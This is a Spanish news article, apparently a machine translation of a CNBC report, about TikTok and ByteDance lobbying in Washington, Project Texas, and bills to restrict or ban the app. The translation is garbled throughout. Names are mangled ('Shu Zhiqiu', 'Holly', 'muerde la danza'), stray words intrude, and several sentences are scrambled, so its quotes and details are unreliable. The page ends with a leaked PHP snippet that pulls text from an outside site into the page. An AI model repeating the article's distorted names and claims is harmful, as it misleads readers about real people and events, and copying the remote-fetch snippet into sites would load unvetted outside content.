TikTok, ByteDance gastan $ 13 millones en campaña de cabildeo de EE. UU.






Juntos, TikTok y su empresa matriz han gastado más de $ 13 millones en cabildeo con funcionarios del gobierno federal desde 2019, un esfuerzo al que los legisladores parecen apuntar para apuntar a la propiedad de la aplicación por parte de una empresa china Ha habido sugerencias o incluso intentos de prohibir TikTok por completo en los Estados Unidos. .


Semanas después de que el representante republicano Ken Buck de Colorado y el senador Josh Hawley de Missouri introdujeran una legislación que prohibiría las descargas de TikTok en todo el país, el personal de Buck en febrero hizo que el público estadounidense de la compañía de redes sociales recibiera una llamada de Michael Beckerman, director de Policy Shop. . Una persona cercana a Buck.


Beckerman rechazó las preocupaciones del personal de Buck de que TikTok estaba recopilando datos de los usuarios y abogó por una nueva iniciativa de la empresa llamada Proyecto Texas, explicó la persona. Project Texas es el intento de TikTok de mantener los datos de sus clientes estadounidenses en un centro seguro administrado por el gigante tecnológico. OráculoEl propósito de esto es disipar las preocupaciones del gobierno de los EE. UU. de que la informaciónLa empresa matriz china puede obtener acceso a Byte Dance o a miembros del partido gobernante en China.


El cabildeo se produce en medio de los continuos esfuerzos de TikTok para aliviar las preocupaciones de los legisladores que quieren prohibir la aplicación, que tiene 150 millones de usuarios activos mensuales en los EE. UU.La empresa ha tratado de demostrar que puede abordar las preocupaciones sobre la información del usuario sin restricciones, pero la mayoría de los legisladoresEnUna polémica audiencia sobre TikTok este mesParecía que el Proyecto Texas haría precisamente eso.






El presidente ejecutivo de TikTok, Shu Zhiqiu, observa mientras testifica ante una audiencia del Comité de Comercio y Energía de la Cámara de Representantes titulada “TikTok: cómo el Congreso puede proteger la privacidad de los datos estadounidenses y a los niños de los daños en línea”. Can Save”, mientras los legisladores prueban una aplicación para compartir videos de propiedad china. , en Capitol Hill en Washington, 23 de marzo de 2023.


Evelyn Hockstein | Reuters






El CEO de TikTok, Shu Zhichi, dijo a los legisladores estadounidenses en la audiencia que ByteDance tiene empleados en China.Acceso a algunos datos de EE. UU. desde la aplicación. Pero les aseguró que los empleados ya no tendrían los datos después de que se completara el Proyecto Texas.


La presión de cabildeo continua y el testimonio de Chiu hasta ahora no han detenido los esfuerzos en Capitol Hill para romper los lazos de TikTok con su propietario chino o limitar el acceso a la aplicación.


Brooke Oberweiter, portavoz de TikTok, no negó ningún elemento de la historia.Defendió el trabajo del equipo de TikTok en Washington y dijo que la compañía estaba tratando de abordar las preocupaciones de privacidad y seguridad de los legisladores.


“Nuestro equipo en Washington está, y siempre ha estado, enfocado en educar a los legisladores y las partes interesadas sobre nuestra empresa y nuestro servicio”, dijo Oberwetter. “Continuaremos nuestro trabajo para informar a los legisladores y al pueblo estadounidense sobre nuestro progreso en la implementación del Proyecto Texas para abordar las preocupaciones de seguridad nacional, y continuaremos trabajando con los legisladores, las partes interesadas y nuestros colegas. Omar continuará trabajando con las empresas en soluciones. que abordan los problemas de privacidad y seguridad de toda la industria”.







Shu Zhiqiu, CEO de TikTok: No recopilamos datos de GPS precisos.






Una de las principales propuestas dirigidas a TikTok es la Ley RESTRICT, que Sens. Mark Warner, D-Va., y John Thune, RS.D. ha sido presentado por un grupo bipartidista de senadores encabezado por El proyecto de ley, que aún no tiene legislación complementaria. En la Cámara, autorizaría al Secretario de Comercio a revisar los riesgos de seguridad nacional relacionados con ciertas transacciones de tecnología con empresas o individuos en un grupo selecto de países extranjeros hostiles, incluida China. El Secretario de Comercio puede recomendar al Presidente acción hasta la prohibición.


Otra propuesta es la Ley de Datos, presentada por el representante Mike McCall, republicano por Texas. Derogaría las protecciones que generalmente han protegido el contenido creativo de las restricciones estadounidenses. También ordenaría al presidente que imponga sanciones a las empresas con sede en China que transfieran datos personales confidenciales de estadounidenses a personas o empresas en China. La propuesta pasó según las líneas del partido a través del Comité de Relaciones Exteriores de la Cámara liderado por el Partido Republicano, y a los demócratas les preocupaba que fuera apresurado.


En el otro extremo del espectro está la legislación de Hawley y Buck que busca prohibir TikTok por completo ordenando al presidente que bloquee las transacciones con ByteDance.


Desde la llamada con Beckerman, Buck no se ha retractado de llamar a la aplicación una amenaza para la seguridad nacional. Los miembros del personal de Buck respondieron a Beckerman que todavía estaban preocupados por las políticas de privacidad, ciberseguridad y seguridad nacional de la compañía, dijo una persona cercana a Buck.


Otro aliado del legislador de Colorado dijo que el dinero de cabildeo se está desperdiciando tratando de cambiar la opinión de Buck. “Parece que están quemando su dinero”, dijo a CNBC un estratega republicano cercano a Buck.


Otro estratega republicano familiarizado con los esfuerzos de cabildeo de TikTok le dijo a CNBC que el “bombardeo de última hora” de la compañía para presionar al Capitolio en las semanas previas al testimonio de Chiu fue un “tiempo de afición”. Las oficinas del Congreso a veces han negado reuniones con representantes de la compañía, dijo la persona, y que los funcionarios de TikTok no se han comunicado con legisladores clave como Holly que se han centrado en la aplicación.


Hawley no ha cejado en su campaña para prohibir TikTok. Trató de obtener el apoyo unánime del Senado para acelerar su proyecto de ley el miércoles. El senador Rand Paul, un republicano de Kentucky que ahora se encuentra entre un pequeño grupo de legisladores de ambos partidos que se han opuesto a los intentos de bloquear el acceso a la aplicación, bloqueó la legislación de Hawley. Si bien hay muchos legisladores que aún no han llegado a la conclusión de que es necesaria una prohibición, solo unos pocos la han rechazado abiertamente.


Quienes se negaron a ser nombrados en esta historia lo hicieron para hablar libremente sobre conversaciones y reuniones privadas. Una portavoz de Holley no respondió a una solicitud de comentarios.


Según los asesores y asistentes de los legisladores del Congreso, la interacción con el equipo de Buck representa solo uno de los muchos casos en que los cabilderos de TikTok, o su empresa matriz ByteDance, con sede en China, han utilizado sus campañas en el Capitolio y han visto caer en saco roto. El hecho de que algunos legisladores hayan mostrado poco interés en escuchar a los ejecutivos de TikTok es la última señal de que la empresa puede necesitar más aliados en el Congreso para evitar nuevas restricciones o una posible prohibición de la aplicación.







El presidente de la Cámara de Representantes, Kevin McCarthy, sobre la prohibición de TikTok: la última administración tenía razón






Warner se reunió con el cabildero de TikTok a principios de este año, según una persona en la reunión en la oficina del senador. Los legisladores de Virginia y Thune presentaron más tarde su propio proyecto de ley que le daría al Secretario de Comercio la autoridad para tomar medidas contra TikTok. Desde entonces, la Casa Blanca ha respaldado el proyecto de ley y ha pedido al Congreso que lo apruebe para que el presidente Joe Biden pueda firmarlo.


La oficina de Warner no respondió a una solicitud de comentarios.


Parece que TikTok ha intensificado su cabildeo justo antes del testimonio de Chiu ante el Comité de Energía y Comercio de la Cámara. La compañía llevó a personas influyentes de TikTok a Washington antes del evento.


La empresa también tenía aliados.Un puñado de legisladores demócratas como el representante Jamal Bowman, D-N.Y. Un día antes de la audiencia, él y los populares creadores de contenido de la aplicación realizaron una conferencia de prensa para oponerse a la posible prohibición.


Pero en reuniones privadas, algunos de esos mismos influencers le dijeron a Bowman que mientras mantenían la aplicación, todas las plataformas de redes sociales, incluida TikTok, tenían reglas para proteger sus datos, según un asistente familiarizado con la conversación.


Independientemente de su influencia en los legisladores, las súplicas de los creadores de mantener el acceso a TikTok en los EE. UU. parecen resonar entre muchos usuarios estadounidenses que ven la aplicación como una fuente de entretenimiento, información e incluso ingresos.Durante y después de la audiencia, los usuarios de TikTok compartieron clips de legisladores haciendo preguntas básicas al director ejecutivo, burlándose del Congreso por lo que vieron como una falta de comprensión de la tecnología.


Pero en base a cinco horas de tenso interrogatorio de miembros de ambos partidos en la audiencia, las apelaciones de los creadores no parecieron disipar las profundas preocupaciones que tienen los legisladores sobre la conexión de la aplicación con China, así como sus propiedades adictivas y potencialmente dañinas. Diseño


“No creo que se haya ganado a ningún legislador”, dijo Alex Moore, representante. John Schakowsky, director de comunicaciones de D-IL, sobre el cabildeo previo a la audiencia de TikTok. Moore agregó que traer a los creadores de TikTok para amplificar el mensaje de la compañía “no ha impresionado a mi jefe”.


Aún así, Moore dijo que su oficina ha escuchado mucho de los electores desde la audiencia. Antes del testimonio, las llamadas sobre Tik-Tik “lloverán”, dijo. Pero después de que “nuestros teléfonos no dejaban de sonar”, la mayoría de las personas que llamaron se opusieron a la prohibición de TikTok.


“Hemos escuchado mucho que nuestros electores no están interesados”, dijo.


Si bien a menudo una llamada de este tipo “comienza caliente”moore dijoIngredientesSchakowsky se calmaría una vez que el personal explicara que quería una legislación de privacidad integral para “no permitir que otras empresas se salieran con la suya” por tales prácticas de datos.


Schakowsky le dijo a CNBC poco después de la audiencia que aún habría “más discusión” sobre abordar las preocupaciones directamente relacionadas con la propiedad china de TikTok. Pero Schakowsky, quien copatrocinó la legislación de privacidad bipartidista que se aprobó en el último Congreso, dijo que esperaba que la audiencia diera un nuevo impulso a las protecciones de privacidad que otros importantes también aplicarán a las empresas tecnológicas.



Esfuerzos coordinados de cabildeo.



Los esfuerzos de cabildeo de TiKTok y ByteDance están directamente relacionados.


Los informes de cabildeo trimestrales de ByteDance muestran que sus cabilderos internos trabajan para TikTok. Incluyen a Beckerman, quien una vez trabajó como director de políticas para el exrepresentante republicano Fred Upton de Michigan, junto con Freddie Barnes, quien trabajó en la oficina del presidente republicano de la Cámara de Representantes, Kevin McCarthy.


TikTok mismo ha contratado a su propia legión de cabilderos externos. Sus últimas contrataciones incluyen a los exrepresentantes Jeff Denham, republicano por California, y Ankit Desai, exasesor de Biden cuando era miembro del Senado de los Estados Unidos.


ByteDance y TikTok han gastado más de $13 millones en cabildeo federal desde 2019, según informes de divulgación de cabildeo y datos revisados ​​por OpenSecrets.


La mayor parte del gasto en cabildeo relacionado con la aplicación social provino de Byte Dance.La empresa matriz de TikTok gastó 5,3 millones de dólares en cabildeo federal en 2022, un nuevo récord para la empresa, según la organización no partidista Open Secrets.


TikTok mismo ha gastado más de $ 900,000 en consultores de cabildeo desde 2020.


también muerde la danzadonó más de $400,000 el año pasado a grupos sin fines de lucro afiliados a miembros del Congreso para “gastos honorarios”, según un documento.


El documento muestra que Byte Dance donó $ 300,000 combinados al Instituto del Caucus Hispano del Congreso y la Fundación del Caucus Negro del Congreso, que están afiliados al caucus predominantemente demócrata en la Cámara. Cada una de estas organizaciones incluye al director de políticas públicas de TikTok, Jesse Price, como miembro de su junta directiva o consejo asesor.


Beckerman, un conocido cabildero de TikTok, firmó el informe que muestra el apoyo de ByteDance.


TikTok y ByteDance también se han dirigido a la oficina ejecutiva de Biden en la Casa Blanca con cabildeo desde 2020, según informes de divulgación.


La Casa Blanca no respondió a una solicitud de más detalles sobre el esfuerzo de cabildeo.



Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');